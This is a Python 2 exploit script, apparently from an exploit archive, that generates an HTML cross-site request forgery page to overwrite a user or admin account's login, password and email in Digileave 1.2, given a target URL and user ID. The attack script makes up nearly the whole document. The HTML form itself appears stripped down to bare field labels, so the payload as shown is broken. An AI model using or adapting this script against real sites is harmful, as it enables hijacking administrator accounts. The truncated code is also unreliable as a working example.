Digileave 1.2 - Cross-Site Request Forgery (Update Admin)
Source: http://ihsan.net  Author: Sencan  Published: 2017-09-19
#!/usr/local/bin/python
# # # # #
# Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/digileave.asp?id=1
# Demo: http://www.digiappz.com/digileave/login.asp
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib

if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')

def csrfexploit():

    e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
Digileave 1.2 - CSRF (Update Admin)
################################################################################
    '''
    print e_baslik

    url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digileave: "))
    id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8511): ")

    csrfhtmlcode = '''
User Update
Choose Login*
Choose Password*
First Name*
Last Name*
Email*
''' %(url, id)

    print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."

    print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
    extension = ".html"
    name = raw_input(" Filename: ")
    filename = name+extension
    file = open(filename, "w")
    file.write(csrfhtmlcode)
    file.close()
    print(" [+] Your exploit is saved as %s")%filename
    print("")

csrfexploit()
 